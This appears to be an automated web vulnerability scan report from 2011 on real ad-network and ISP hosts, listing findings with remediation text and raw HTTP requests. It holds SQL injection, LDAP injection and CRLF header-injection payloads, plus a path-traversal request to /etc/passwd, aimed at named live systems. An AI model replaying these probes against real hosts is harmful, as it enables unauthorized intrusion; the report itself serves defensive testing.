22.11. http://vtr.com/productos/principal/inc/js/jquery.dimensions.js

22.12. http://vtr.com/productos/principal/inc/js/jquery.pngFix.pack.js

22.13. http://vtr.com/productos/principal/inc/js/php.full.min.js

22.14. http://vtr.com/productos/principal/inc/js/shadowbox/adapters/shadowbox-jquery.js

22.15. http://vtr.com/productos/principal/inc/js/shadowbox/shadowbox.css

22.16. http://vtr.com/productos/principal/inc/js/shadowbox/shadowbox.js

22.17. http://www.bizoservices.com/

22.18. http://www.bizoservices.com/about.html

22.19. http://www.bizoservices.com/careers.html

22.20. http://www.bizoservices.com/contact.aspx

22.21. http://www.bizoservices.com/cortex/bb/bb_reg.aspx

22.22. http://www.bizoservices.com/cortex/ef/ef_reg_free.aspx

22.23. http://www.bizoservices.com/index.html

22.24. http://www.bizoservices.com/partners.aspx

22.25. http://www.bizoservices.com/pricing.aspx

22.26. http://www.bizoservices.com/services.html

22.27. http://www.bizoservices.com/services/av.html

22.28. http://www.bizoservices.com/services/av_faqs.html

22.29. http://www.bizoservices.com/services/backoffice.html

22.30. http://www.bizoservices.com/services/bizomail_lite.html

22.31. http://www.bizoservices.com/services/bizomail_std.html

22.32. http://www.bizoservices.com/services/cortex/bb/bb_reg.aspx

22.33. http://www.bizoservices.com/services/cortex/ef/ef_reg_free.aspx

22.34. http://www.bizoservices.com/services/defend_perimeter.html

22.35. http://www.bizoservices.com/services/desktop_security.html

22.36. http://www.bizoservices.com/services/email_filter.html

22.37. http://www.bizoservices.com/services/email_guard.html

22.38. http://www.bizoservices.com/services/hosting.html

22.39. http://www.bizoservices.com/services/internet_addon.html

22.40. http://www.bizoservices.com/services/internet_connection.html

22.41. http://www.bizoservices.com/services/office_connect.html

22.42. http://www.bizoservices.com/services/online_backup.html

22.43. http://www.bizoservices.com/services/online_system_monitor.html

22.44. http://www.bizoservices.com/services/pay_roll.html

22.45. http://www.bizoservices.com/services/shareddrive.html

22.46. http://www.bizoservices.com/services/talk/pabx.html

22.47. http://www.bizoservices.com/services/talk/telemarket.html

22.48. http://www.bizoservices.com/services/talk/telephone.html

22.49. http://www.bizoservices.com/services/talk/tolls.html

22.50. http://www.bizoservices.com/services/talk/virtual_reception.html

22.51. http://www.bizoservices.com/services/web_filter.html

22.52. http://www.bizoservices.com/support.html

22.53. http://www.gnu.org/licenses/gpl.html

22.54. http://www.kol.co.nz/contact.php

22.55. http://www.kol.co.nz/terms_conditions.php

22.56. http://www.opensource.org/licenses/gpl-license.php

22.57. http://www.opensource.org/licenses/mit-license.php

22.58. http://www.orcon.net.nz/lifestyle

22.59. http://www.orcon.net.nz/lifestyle/rss

22.60. http://www.orcon.net.nz/scripts/jquery.pngFix.pack.js

22.61. http://www.orcon.net.nz/support/network_status_rss

22.62. http://www.orcon.net.nz/support/talk

22.63. http://www.orcon.net.nz/work/

22.64. http://www.orcon.net.nz/work/=&ref=iserve

22.65. http://www.orcon.net.nz/work/business_hosting

22.66. http://www.orcon.net.nz/work/business_internet

22.67. http://www.orcon.net.nz/work/business_phone_sip_trunk

22.68. http://www.orcon.net.nz/work/hosting_plans/

22.69. http://www.orcon.net.nz/work/page/business_broadband_overview

22.70. http://www.orcon.net.nz/work/page/business_phone_line

22.71. http://www.orcon.net.nz/work/page/business_server_dedicated

22.72. http://www.orcon.net.nz/work/page/business_server_hosting_overview

22.73. http://www.orcon.net.nz/work/page/business_server_software

22.74. http://www.orcon.net.nz/work/page/business_server_virtual

22.75. http://www.orcon.net.nz/work/page/case_study_certus

22.76. http://www.orcon.net.nz/work/page/case_study_speedscan

22.77. http://www.orcon.net.nz/work/page/case_study_zeald

22.78. http://www.orcon.net.nz/work/page/cloud_computing_overview

22.79. http://www.orcon.net.nz/work/page/co-location

22.80. http://www.orcon.net.nz/work/page/domain_names_overview

22.81. http://www.orcon.net.nz/work/page/fibre_optic

22.82. http://www.orcon.net.nz/work/page/free_domain_hosting

22.83. http://www.orcon.net.nz/work/page/hosted_exchange

22.84. http://www.orcon.net.nz/work/page/hsns

22.85. http://www.orcon.net.nz/work/page/register_a_domain

22.86. http://www.orcon.net.nz/work/page/sip_trunk

22.87. http://www.orcon.net.nz/work/page/sip_trunk_data_sheet

22.88. http://www.orcon.net.nz/work/page/wan

22.89. http://www.orcon.net.nz/work/page/zealous_support

22.90. http://www.orcon.net.nz/work/plans

22.91. http://www.orcon.net.nz/work/wholesale_services

22.92. http://www.righthealth.com/

22.93. http://www.tagged.com/safety.html

22.94. http://www.tagged.com/terms_of_service.html

23. Private IP addresses disclosed

23.1. http://api.facebook.com/restserver.php

23.2. http://static.ak.fbcdn.net/connect.php/js/FB.Share

23.3. http://www.facebook.com/plugins/like.php

24. Robots.txt file

24.1. http://a.dlqm.net/adscgen/log_ut_err.php

24.2. http://about-tagged.com/

24.3. http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932

24.4. http://ads.pointroll.com/PortalServe/

24.5. http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

24.6. http://amch.questionmarket.com/adscgen/sta.php

24.7. http://api.facebook.com/restserver.php

24.8. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

24.9. http://b.scorecardresearch.com/p

24.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

24.11. http://c.betrad.com/surly.js

24.12. http://c5.zedo.com/jsc/c5/ff2.html

24.13. http://c7.zedo.com/bar/v16-406/c5/jsc/gl.js

24.14. http://cm.g.doubleclick.net/pixel

24.15. http://code.google.com/p/swfobject/

24.16. https://d2s.iserve.net.nz:8443/

24.17. http://ds.serving-sys.com/BurstingRes//Site-8706/Type-11/3342702_4909a619-2096-49cc-b852-03772e7f690e.js

24.18. http://feeds.bbci.co.uk/news/rss.xml

24.19. http://fonts.googleapis.com/css

24.20. http://googleads.g.doubleclick.net/pagead/ads

24.21. http://help.tagged.com/index.php/report-abuse.html

24.22. http://jigsaw.w3.org/css-validator/validator-text.html

24.23. http://jquery.andreaseberhard.de/

24.24. https://mail.orcon.net.nz/

24.25. http://malsup.com/jquery/cycle/

24.26. http://medienfreunde.com/lab/innerfade/

24.27. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

24.28. http://pixel.quantserve.com/pixel

24.29. http://player.ooyala.com/player.js

24.30. http://pubads.g.doubleclick.net/gampad/ads

24.31. http://r1-ads.ace.advertising.com/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

24.32. http://r1.zedo.com/log/ERR.gif

24.33. http://safebrowsing.clients.google.com/safebrowsing/downloads

24.34. http://secure.tagged.com/

24.35. https://secure.tagged.com/secure_login.html

24.36. http://segment-pixel.invitemedia.com/pixel

24.37. http://speed.pointroll.com/PointRoll/Media/Panels/Ford/724287/FDAF_2011_Shared_300x250_Default.jpg

24.38. http://tag.admeld.com/match

24.39. http://tcr.tynt.com/javascripts/Tracer.js

24.40. http://themes.googleusercontent.com/font

24.41. http://translate.googleapis.com/translate_a/t

24.42. http://tweetbeat.com/

24.43. http://webmail.orcon.net.nz/

24.44. http://www.benjaminsterling.com/experiments/jqShuffle/

24.45. http://www.bizoservices.com/

24.46. http://www.facebook.com/plugins/like.php

24.47. http://www.gnu.org/licenses/gpl.html

24.48. http://www.google-analytics.com/__utm.gif

24.49. http://www.googleadservices.com/pagead/conversion/1034849195/

24.50. http://www.kosmix.com/

24.51. http://www.mathias-bank.de/

24.52. http://www.opensource.org/licenses/gpl-license.php

24.53. http://www.orcon.net.nz/work/=&ref=iserve

24.54. http://www.righthealth.com/

24.55. http://www.tagged.com/

25. Cacheable HTTPS response

25.1. https://console.iserve.net.nz/favicon.ico

25.2. https://console.iservices.net.nz/favicon.ico

25.3. https://d2s.iserve.net.nz:8443/

25.4. https://d2s.iserve.net.nz:8443/docs/classifier.html

25.5. https://d2s.iserve.net.nz:8443/docs/concepts.html

25.6. https://d2s.iserve.net.nz:8443/docs/damnspam.html

25.7. https://d2s.iserve.net.nz:8443/docs/faq.html

25.8. https://d2s.iserve.net.nz:8443/docs/global.html

25.9. https://d2s.iserve.net.nz:8443/docs/index.html

25.10. https://d2s.iserve.net.nz:8443/docs/prefs.html

25.11. https://d2s.iserve.net.nz:8443/docs/remove-spam.html

25.12. https://d2s.iserve.net.nz:8443/docs/stats.html

25.13. https://d2s.iserve.net.nz:8443/docs/training.html

25.14. https://d2s.iserve.net.nz:8443/index.html

25.15. https://d2s.iserve.net.nz:8443/scripts//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

25.16. https://idm.net.nz/favicon.ico

25.17. https://idm.net.nz/secure/

25.18. https://idm.net.nz/secure/index.php

25.19. https://orcres.cosmos.net.nz/orconmembersarea.php

25.20. https://secure.tagged.com/blank.html

25.21. https://secure.tagged.com/favicon.ico

26. Multiple content types specified

27. HTML does not specify charset

27.1. http://ads.pointroll.com/PortalServe/

27.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

27.3. http://c5.zedo.com/jsc/c5/ff2.html

27.4. https://d2s.iserve.net.nz:8443/d2s/ViewAccount

27.5. http://jigsaw.w3.org/css-validator/validator-text.html

27.6. https://orcres.cosmos.net.nz/orconmembersarea.php

27.7. http://uac.advertising.com/wrapper/aceUACping.htm

27.8. http://webmail.iserve.net.nz/

27.9. http://www.bizoservices.com/pricing.html

27.10. http://www.bizoservices.com/protect/protect.html

28. Content type incorrectly stated

28.1. http://about-tagged.com/wp-content/themes/wptagged/favicon.ico

28.2. http://ads.pointroll.com/PortalServe/

28.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.4. https://console.iserve.net.nz/favicon.ico

28.5. https://console.iservices.net.nz/favicon.ico

28.6. https://idm.net.nz/favicon.ico

28.7. https://orcres.cosmos.net.nz/orconmembersarea.php

28.8. https://secure.tagged.com/favicon.ico

28.9. http://svirtual.vtr.net/svweb/inc/js/validarut.js

28.10. http://thumbnails.truveo.com/0018/FD/06/FD0609A01D0D44E2D627FC.jpg

28.11. http://thumbnails.truveo.com/0020/12/A0/12A0B49C467F2FB5151A6C.jpg

28.12. http://thumbnails.truveo.com/0020/16/E9/16E9F7CBA751E8079C1E52.jpg

28.13. http://translate.googleapis.com/translate_a/t

28.14. http://vtr.com/favicon.ico

28.15. http://vtr.com/icono.ico

28.16. http://vtr.com/productos/principal/selector_comuna/sesion.php

28.17. http://www.tagged.com/api/

28.18. http://www.tagged.com/favicon.ico



1. SQL injection  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N2465.AOLanywhere/B5391584.3

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 95066298'%20or%201%3d1--%20 and 95066298'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

GET /adj/N2465.AOLanywhere/B5391584.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum=0001013955/cstr=24692193=_4dd01da9,1681601282,776692%5E1013955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=24692193/optn=64?trg=;ord=1681601282?&195066298'%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=1964
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 15 May 2011 18:39:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6372

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Thu Apr 14 17:17:05 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\n\n');



function DCFlash(id,pVM){

var swf = "http://s0.2mdn.net/1104996/sg-728x90.swf";

var gif = "http://s0.2mdn.net/1104996/Save gas_Q3_728x90_4.1.gif";

var minV = 10;

var FWH = ' width="728" height="90" ';

var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b08/f/b5/%2a/h%3B239326039%3B0-0%3B0%3B62235844%3B3454-728/90%3B41548954/41566741/2%3B%3B%7Esscs%3D%3fhttp://r1-ads.ace.advertising.com/click/site=0000776692/mnum=0001013955/cstr=24692193=_4dd01da9,1681601282,776692%5E1013955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=24692193/optn=64?trg=http%3a%2f%2fwww.autozone.com/autozone/landing/page.jsp%3Fname%3Dsave-gas-improve-mileage%26cmpid%3DF11_040");

var fscUrl = url;

var fscUrlClickTagFound = false;

var wmode = "opaque";

var bg = "";

var dcallowscriptaccess = "never";



var openWindow = "false";

var winW = 0;

var winH = 0;

var winL = 0;

var winT = 0;



var moviePath=swf.substring(0,swf.lastIndexOf("/"));

var sm=new Array();





var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b08/f/b5/%2a/h%3B239326039%3B0-0%3B0%3B62235844%3B3454-728/90%3B41548954/41566741/2%3B%3B%7Esscs%3D%3fhttp://r1-ads.ace.advertising.com/click/site=0000776692/mnum=0001013955/cstr=24692193=_4dd01da9,1681601282,776692%5E1013955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=24692193/optn=64?trg=http%3a%2f%2fwww.autozone.com/autozone/landing/page.jsp%3Fname%3Dsave-gas-improve-mileage%26cmpid%3DF11_040");

var ctp=new Array();

var ctv=new Array();

ctp[0] = "clickTAG";
ctv[0] = "";




var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';

for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}

for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {

var ctParam = ctp[ctIndex];

var ctVal = ctv[ctIndex];

if(ctVal != null && typeof(ctVal) == 'string') {

if(ctVal == "") {

ctVal = defaultCtVa
...[SNIP]...

Request 2

GET /adj/N2465.AOLanywhere/B5391584.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum=0001013955/cstr=24692193=_4dd01da9,1681601282,776692%5E1013955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=24692193/optn=64?trg=;ord=1681601282?&195066298'%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=1964
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 15 May 2011 18:39:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6082

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed May 04 13:46:28 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1104996/AZ_Brakes_728x90_Q4_P10.swf";
var gif = "http://s0.2mdn.net/1104996/AZ_Brakes_728x90_Q4_P10.gif";
var minV = 9;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b08/f/b5/%2a/r%3B239326039%3B1-0%3B0%3B62235844%3B3454-728/90%3B42022885/42040672/1%3B%3B%7Esscs%3D%3fhttp://r1-ads.ace.advertising.com/click/site=0000776692/mnum=0001013955/cstr=24692193=_4dd01da9,1681601282,776692%5E1013955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=24692193/optn=64?trg=http%3a%2f%2fwww.autozone.com/autozone/brakeJob/brakeJob.jsp%3Fcmpid%3DF11_028");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b08/f/b5/%2a/r%3B239326039%3B1-0%3B0%3B62235844%3B3454-728/90%3B42022885/42040672/1%3B%3B%7Esscs%3D%3fhttp://r1-ads.ace.advertising.com/click/site=0000776692/mnum=0001013955/cstr=24692193=_4dd01da9,1681601282,776692%5E1013955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=24692193/optn=64?trg=http%3a%2f%2fwww.autozone.com/autozone/brakeJob/brakeJob.jsp%3Fcmpid%3DF11_028");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";
ctp[1] = "clickTag";
ctv[1] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;

...[SNIP]...

2. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The Pos parameter appears to be vulnerable to LDAP injection attacks.

The payloads 36e55bf8967b52bb)(sn=* and 36e55bf8967b52bb)!(sn=* were each submitted in the Pos parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /BurstingPipe/BannerSource.asp?FlightID=1686177&Page=&PluID=0&Pos=36e55bf8967b52bb)(sn=* HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=FLV=0&RES=128&WMPV=0; B3=98IM0000000000uz6rGx0000000003uE9v950000000001uz94DX0000000002uz; A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002cM5KaNgA0aR600003iN4OaLyu0d9d00000; C4=; u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I5020; ActivityInfo=000iPlceU%5f;

Response 1

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-8706/Type-0/2431cb34-cff9-4ab3-9273-74ecfd5a422b.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002iN4OaLyu0d9d00000cM5KaNgL0aR600004; expires=Sat, 13-Aug-2011 13:35:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=98IM0000000000uz6rGx0000000004uE9v950000000001uz94DX0000000002uz; expires=Sat, 13-Aug-2011 13:35:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I502g; expires=Sat, 13-Aug-2011 13:35:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_36e55bf8967b52bb)(sn=*=3342702
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:35:40 GMT
Connection: close

Request 2

GET /BurstingPipe/BannerSource.asp?FlightID=1686177&Page=&PluID=0&Pos=36e55bf8967b52bb)!(sn=* HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=FLV=0&RES=128&WMPV=0; B3=98IM0000000000uz6rGx0000000003uE9v950000000001uz94DX0000000002uz; A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002cM5KaNgA0aR600003iN4OaLyu0d9d00000; C4=; u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I5020; ActivityInfo=000iPlceU%5f;

Response 2

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-8706/Type-0/2431cb34-cff9-4ab3-9273-74ecfd5a422b.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002iN4OaLyu0d9d00000cM5KaNgL0aR600004; expires=Sat, 13-Aug-2011 13:35:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=98IM0000000000uz6rGx0000000004uE9v950000000001uz94DX0000000002uz; expires=Sat, 13-Aug-2011 13:35:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I502g; expires=Sat, 13-Aug-2011 13:35:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_36e55bf8967b52bb)!(sn=*=3342702
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:35:40 GMT
Connection: close


3. HTTP header injection  previous  next
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 3b2a2%0d%0a69848788ea5 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=3342702~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~13~0~01020^ebAboveTheFoldDuration~13~0~01020&OptOut=0&ebRandom=0.7164087416689661&flv=3b2a2%0d%0a69848788ea5&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve
Origin: http://www.orcon.net.nz

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=c359dff1-3bf6-432c-88ff-c6a59b4bf0723I5030; expires=Sat, 13-Aug-2011 13:23:24 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=3b2a2
69848788ea5
&RES=128&WMPV=0; expires=Sat, 13-Aug-2011 13: 23:24 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:23 GMT
Connection: close
Content-Length: 0


3.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload d9a0a%0d%0a0414bf43704 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=3342702~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~13~0~01020^ebAboveTheFoldDuration~13~0~01020&OptOut=0&ebRandom=0.7164087416689661&flv=0&wmpv=0&res=d9a0a%0d%0a0414bf43704 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve
Origin: http://www.orcon.net.nz

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=d0cfa857-fccc-4fa5-87fe-6b168874f10b3I5040; expires=Sat, 13-Aug-2011 13:23:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=0&RES=d9a0a
0414bf43704
&WMPV=0; expires=Sat, 13-Aug-2011 13: 23:25 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:25 GMT
Connection: close
Content-Length: 0


3.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 4922e%0d%0af6434b7c936 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=3342702~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~13~0~01020^ebAboveTheFoldDuration~13~0~01020&OptOut=0&ebRandom=0.7164087416689661&flv=0&wmpv=4922e%0d%0af6434b7c936&res=128 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve
